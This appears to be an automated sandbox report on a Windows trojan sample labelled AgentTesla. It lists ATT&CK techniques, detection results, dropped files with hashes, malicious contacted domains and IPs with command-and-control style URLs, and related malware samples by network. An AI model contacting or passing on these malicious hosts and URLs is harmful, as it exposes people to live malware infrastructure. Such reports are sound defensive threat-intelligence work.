Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Process Injection712	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Deobfuscate/Decode Files or Information1	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information4	DCSync	System Information Discovery112	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Rundll321	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Software Packing3	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label
gzU8odwaPalRTGB.exe	29%	ReversingLabs	Win32.Trojan.AgentTesla
gzU8odwaPalRTGB.exe	100%	Avira	HEUR/AGEN.1138557
gzU8odwaPalRTGB.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\fgEePtnFJH.exe	100%	Avira	HEUR/AGEN.1138557
C:\Users\user\AppData\Roaming\fgEePtnFJH.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\fgEePtnFJH.exe	29%	ReversingLabs	Win32.Trojan.AgentTesla

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.0.gzU8odwaPalRTGB.exe.d50000.0.unpack	100%	Avira	HEUR/AGEN.1138557	Download File
0.2.gzU8odwaPalRTGB.exe.d50000.0.unpack	100%	Avira	HEUR/AGEN.1138557	Download File
5.2.RegSvcs.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.founder.com.cn/cnN	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/y	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
www.smarttel.management/msc/	0%	Avira URL Cloud	safe
http://www.fonts.comicwl	0%	Avira URL Cloud	safe
http://tempuri.org/GridOneHSDataSet.xsd	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn;	0%	Avira URL Cloud	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.novergi.com/msc/?szr8=ZuDCMQ3I4T3VSTegk+AGxuqfe6TeNyWCjdwuw+un6PC0oplRc+HjqgF4wozRSCgma/XR&4hnPsj=W2J4SLjHGHypclVp	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.realsults.com/msc/?szr8=SLnxv5WEj6Yhjlrb8B4FzKU74ag+VtkikWCAHb2VKlwGrAtgyss6rL13pJnEzWIQGWFv&4hnPsj=W2J4SLjHGHypclVp	0%	Avira URL Cloud	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.founder.com.cn/cnc	0%	Avira URL Cloud	safe
http://tempuri.org/HighScoresDataSet.xsd	0%	Avira URL Cloud	safe
http://www.sandoll.co.krv	0%	Avira URL Cloud	safe
http://www.fontbureau.comcetab	0%	Avira URL Cloud	safe
http://www.tiro.comn	0%	URL Reputation	safe
http://www.tiro.comn	0%	URL Reputation	safe
http://www.tiro.comn	0%	URL Reputation	safe
http://www.tiro.com6l=	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/F	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/F	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/F	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
http://en.w	0%	URL Reputation	safe
http://en.w	0%	URL Reputation	safe
http://en.w	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.fonts.comc6l=	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.sajatypeworks.coma-d	0%	Avira URL Cloud	safe
http://www.fontbureau.como	0%	URL Reputation	safe
http://www.fontbureau.como	0%	URL Reputation	safe
http://www.fontbureau.como	0%	URL Reputation	safe
http://www.tiro.comhlg	0%	Avira URL Cloud	safe
http://www.fonts.comnMlB	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.novergi.com	162.0.213.203	true	true	unknown
www.realsults.com	154.203.184.76	true	true	unknown
www.primarewards.net	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.smarttel.management/msc/	true	Avira URL Cloud: safe	low
http://www.novergi.com/msc/?szr8=ZuDCMQ3I4T3VSTegk+AGxuqfe6TeNyWCjdwuw+un6PC0oplRc+HjqgF4wozRSCgma/XR&4hnPsj=W2J4SLjHGHypclVp	true	Avira URL Cloud: safe	unknown
http://www.realsults.com/msc/?szr8=SLnxv5WEj6Yhjlrb8B4FzKU74ag+VtkikWCAHb2VKlwGrAtgyss6rL13pJnEzWIQGWFv&4hnPsj=W2J4SLjHGHypclVp	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.founder.com.cn/cnN	gzU8odwaPalRTGB.exe, 00000000.00000003.240236409.0000000006294000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designersG	gzU8odwaPalRTGB.exe, 00000000.00000002.266347099.0000000006380000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/y	gzU8odwaPalRTGB.exe, 00000000.00000003.240412200.0000000006294000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/?	gzU8odwaPalRTGB.exe, 00000000.00000002.266347099.0000000006380000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	gzU8odwaPalRTGB.exe, 00000000.00000002.266347099.0000000006380000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	gzU8odwaPalRTGB.exe, 00000000.00000002.266347099.0000000006380000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.fonts.comicwl	gzU8odwaPalRTGB.exe, 00000000.00000003.238372995.00000000062AB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/GridOneHSDataSet.xsd	gzU8odwaPalRTGB.exe	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn;	gzU8odwaPalRTGB.exe, 00000000.00000003.240223538.00000000062CD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	gzU8odwaPalRTGB.exe, 00000000.00000002.266347099.0000000006380000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css	gzU8odwaPalRTGB.exe, 00000000.00000002.261174361.0000000003136000.00000004.00000001.sdmp	false		high
http://www.sajatypeworks.com	gzU8odwaPalRTGB.exe, 00000000.00000002.266347099.0000000006380000.00000002.00000001.sdmp, gzU8odwaPalRTGB.exe, 00000000.00000003.238136203.00000000062AE000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	gzU8odwaPalRTGB.exe, 00000000.00000002.266347099.0000000006380000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	gzU8odwaPalRTGB.exe, 00000000.00000002.266347099.0000000006380000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	gzU8odwaPalRTGB.exe, 00000000.00000002.266347099.0000000006380000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	gzU8odwaPalRTGB.exe, 00000000.00000002.266347099.0000000006380000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	gzU8odwaPalRTGB.exe, 00000000.00000002.266347099.0000000006380000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fonts.com	gzU8odwaPalRTGB.exe, 00000000.00000002.266347099.0000000006380000.00000002.00000001.sdmp, gzU8odwaPalRTGB.exe, 00000000.00000003.238346544.00000000062AE000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	gzU8odwaPalRTGB.exe, 00000000.00000002.266347099.0000000006380000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	gzU8odwaPalRTGB.exe, 00000000.00000002.266347099.0000000006380000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	gzU8odwaPalRTGB.exe, 00000000.00000002.266347099.0000000006380000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	gzU8odwaPalRTGB.exe, 00000000.00000002.261130122.00000000030E1000.00000004.00000001.sdmp	false		high
http://www.sakkal.com	gzU8odwaPalRTGB.exe, 00000000.00000002.266347099.0000000006380000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cnc	gzU8odwaPalRTGB.exe, 00000000.00000003.240236409.0000000006294000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/HighScoresDataSet.xsd	gzU8odwaPalRTGB.exe	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	gzU8odwaPalRTGB.exe, 00000000.00000002.266347099.0000000006380000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	gzU8odwaPalRTGB.exe, 00000000.00000002.266347099.0000000006380000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.krv	gzU8odwaPalRTGB.exe, 00000000.00000003.239669252.0000000006296000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.comcetab	gzU8odwaPalRTGB.exe, 00000000.00000002.266271453.0000000006290000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.comn	gzU8odwaPalRTGB.exe, 00000000.00000003.238853595.00000000062AB000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.tiro.com6l=	gzU8odwaPalRTGB.exe, 00000000.00000003.238853595.00000000062AB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.jiyu-kobo.co.jp/F	gzU8odwaPalRTGB.exe, 00000000.00000003.241670026.0000000006294000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/jp/	gzU8odwaPalRTGB.exe, 00000000.00000003.241670026.0000000006294000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://en.w	gzU8odwaPalRTGB.exe, 00000000.00000003.237699855.000000000194D000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.coml	gzU8odwaPalRTGB.exe, 00000000.00000002.266347099.0000000006380000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	gzU8odwaPalRTGB.exe, 00000000.00000002.266347099.0000000006380000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.fonts.comc6l=	gzU8odwaPalRTGB.exe, 00000000.00000003.238372995.00000000062AB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.founder.com.cn/cn	gzU8odwaPalRTGB.exe, 00000000.00000002.266347099.0000000006380000.00000002.00000001.sdmp, gzU8odwaPalRTGB.exe, 00000000.00000003.240223538.00000000062CD000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	gzU8odwaPalRTGB.exe, 00000000.00000002.266347099.0000000006380000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/	gzU8odwaPalRTGB.exe, 00000000.00000003.241670026.0000000006294000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.coma-d	gzU8odwaPalRTGB.exe, 00000000.00000003.238136203.00000000062AE000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.como	gzU8odwaPalRTGB.exe, 00000000.00000002.266271453.0000000006290000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	gzU8odwaPalRTGB.exe, 00000000.00000002.266347099.0000000006380000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.289815525.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.tiro.comhlg	gzU8odwaPalRTGB.exe, 00000000.00000003.238739060.00000000062AB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fonts.comnMlB	gzU8odwaPalRTGB.exe, 00000000.00000003.238340434.00000000062AB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
162.0.213.203	www.novergi.com	Canada		35893	ACPCA	true
154.203.184.76	www.realsults.com	Seychelles		139646	HKMTC-AS-APHONGKONGMegalayerTechnologyCoLimitedHK	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	383962
Start date:	08.04.2021
Start time:	13:11:12
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	gzU8odwaPalRTGB.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	30
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@10/4@3/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 59.7% (good quality ratio 54.4%) Quality average: 72.8% Quality standard deviation: 31.3%
HCA Information:	Successful, ratio: 94% Number of executed functions: 153 Number of non-executed functions: 151
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 13.64.90.137, 52.255.188.83, 104.42.151.234, 23.54.113.53, 52.147.198.201, 92.122.144.200, 20.82.210.154, 23.10.249.43, 23.10.249.26, 23.0.174.185, 23.0.174.200, 20.54.26.129 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/383962/sample/gzU8odwaPalRTGB.exe

Simulations

Behavior and APIs

Time	Type	Description
13:12:14	API Interceptor	1x Sleep call for process: gzU8odwaPalRTGB.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
162.0.213.203	yxQWzvifFe.exe	Get hash	malicious	Browse	www.novergi.com/gts/?8p=2dRTAnw8b&uDHXm=yLPfVdgI065g3WM79VbgSaNay6zP4KCNC6LcPfTfXYj/FN8kZL3TM6YFBfxkmCiyo0tD
	SCAN_20210115140930669.exe	Get hash	malicious	Browse	www.novergi.com/2kf/?MXEXp=Xbi8qH9H3Z9HCTO0&h0DhCtA=+0IOzSX8qprA1N1aLTdovlGjKwnvHfXYWHF/NiQugPBJRNBEpFSy7sOoCUWCTacUo6UP
	Order (2021.01.06).exe	Get hash	malicious	Browse	www.novergi.com/2kf/?IR9pb4=+0IOzSX8qprA1N1aLTdovlGjKwnvHfXYWHF/NiQugPBJRNBEpFSy7sOoCX24DL8syd1I&4h=NTlpi0

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www.novergi.com	yxQWzvifFe.exe	Get hash	malicious	Browse	162.0.213.203
	SCAN_20210115140930669.exe	Get hash	malicious	Browse	162.0.213.203
	Order (2021.01.06).exe	Get hash	malicious	Browse	162.0.213.203

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HKMTC-AS-APHONGKONGMegalayerTechnologyCoLimitedHK	FTT103634332.exe	Get hash	malicious	Browse	154.196.155.29
	PaymentInvoice.exe	Get hash	malicious	Browse	154.196.151.57
	vfe1GoeC5F.exe	Get hash	malicious	Browse	154.203.238.233
	FeDex Shipment Confirmation.exe	Get hash	malicious	Browse	154.203.230.47
	FeDex Shipment Confirmation.exe	Get hash	malicious	Browse	154.203.230.47
	jeV2hEujPM0FNhG.exe	Get hash	malicious	Browse	154.196.153.6
	OGb7IA8jzKp2UUT.exe	Get hash	malicious	Browse	154.196.153.6
	SWIFT MT103_Pdf.exe	Get hash	malicious	Browse	154.196.155.60
	Payment Advice_Pdf.exe	Get hash	malicious	Browse	154.196.155.60
	q171wbs4Aj.exe	Get hash	malicious	Browse	154.196.151.25
	winlog.exe	Get hash	malicious	Browse	154.203.198.196
	c5twLLnwwY.exe	Get hash	malicious	Browse	154.196.133.108
	Client.vbs	Get hash	malicious	Browse	154.203.230.47
	0113 INV_PAK.xlsx	Get hash	malicious	Browse	154.196.151.25
	Consignment Document PL&BL Draft.exe	Get hash	malicious	Browse	154.196.243.121
	z6qKV40n75.exe	Get hash	malicious	Browse	154.196.150.25
	XWW8KE7078.exe	Get hash	malicious	Browse	154.196.155.56
	Purchase Order 75MF3B84_Pdf.exe	Get hash	malicious	Browse	154.196.155.60
	PURCHASE ORDER_PDF.exe	Get hash	malicious	Browse	154.196.155.60
	CLxJeVvzMA.exe	Get hash	malicious	Browse	154.203.159.213
ACPCA	W88AZXFGH.exe	Get hash	malicious	Browse	162.0.215.54
	xqtEOiEeHh.exe	Get hash	malicious	Browse	162.0.220.187
	nnrlOwKZlc.exe	Get hash	malicious	Browse	162.0.210.44
	swift_76567643.exe	Get hash	malicious	Browse	162.0.209.125
	PROFORMA INVOICE.exe	Get hash	malicious	Browse	162.0.215.54
	ORDER_PDF.exe	Get hash	malicious	Browse	162.0.216.125
	hfGKHMTTDR.exe	Get hash	malicious	Browse	162.0.210.44
	cMOtS8JQVW.exe	Get hash	malicious	Browse	162.0.210.44
	ekdCcEl5KV.exe	Get hash	malicious	Browse	162.0.210.44
	4FNTlzlu10.exe	Get hash	malicious	Browse	162.0.210.44
	1.sh	Get hash	malicious	Browse	162.9.249.248
	9MyoOYNXKe.exe	Get hash	malicious	Browse	162.0.210.44
	yxQWzvifFe.exe	Get hash	malicious	Browse	162.0.213.203
	Shipping Doc.exe	Get hash	malicious	Browse	162.0.211.196
	Inv 10012021.doc	Get hash	malicious	Browse	162.0.215.194
	L257MJZ0TP.htm	Get hash	malicious	Browse	162.0.209.171
	P.O 5282.exe	Get hash	malicious	Browse	162.0.209.113
	BROCHURES.doc	Get hash	malicious	Browse	162.0.215.237
	Jackson Collins@278180-3963.htm	Get hash	malicious	Browse	162.0.209.117
	PAYMENT SWIFT MT103.xlsx	Get hash	malicious	Browse	162.0.215.9

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\gzU8odwaPalRTGB.exe.log Download File
Process:	C:\Users\user\Desktop\gzU8odwaPalRTGB.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1314
Entropy (8bit):	5.350128552078965
Encrypted:	false
SSDEEP:	24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
MD5:	1DC1A2DCC9EFAA84EABF4F6D6066565B
SHA1:	B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
SHA-256:	28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
SHA-512:	95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Temp\tmpDFE8.tmp Download File
Process:	C:\Users\user\Desktop\gzU8odwaPalRTGB.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1647
Entropy (8bit):	5.169458475171501
Encrypted:	false
SSDEEP:	24:2dH4+SEqC/a7hTlNMFpH/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBGBtn:cbhC7ZlNQF/rydbz9I3YODOLNdq3IT
MD5:	43D09D99A1183D27D8BD6C31F7FB6416
SHA1:	647674277B12D074FFE749E4CA879985ABA38A5E
SHA-256:	53CE83C8B03890F5037D9B9CA3EF2B1438760AD61C5BD90020C82EE7C02AA6EA
SHA-512:	A9B61EF73EB67886E79057F52AD2B8976CB408998B987448F5BC048613D5E0FC8825665A5D7191B6AD868E7300F20DF2DFE17A2DDF9FC3D507E3A733B36E2CE1
Malicious:	true
Reputation:	low
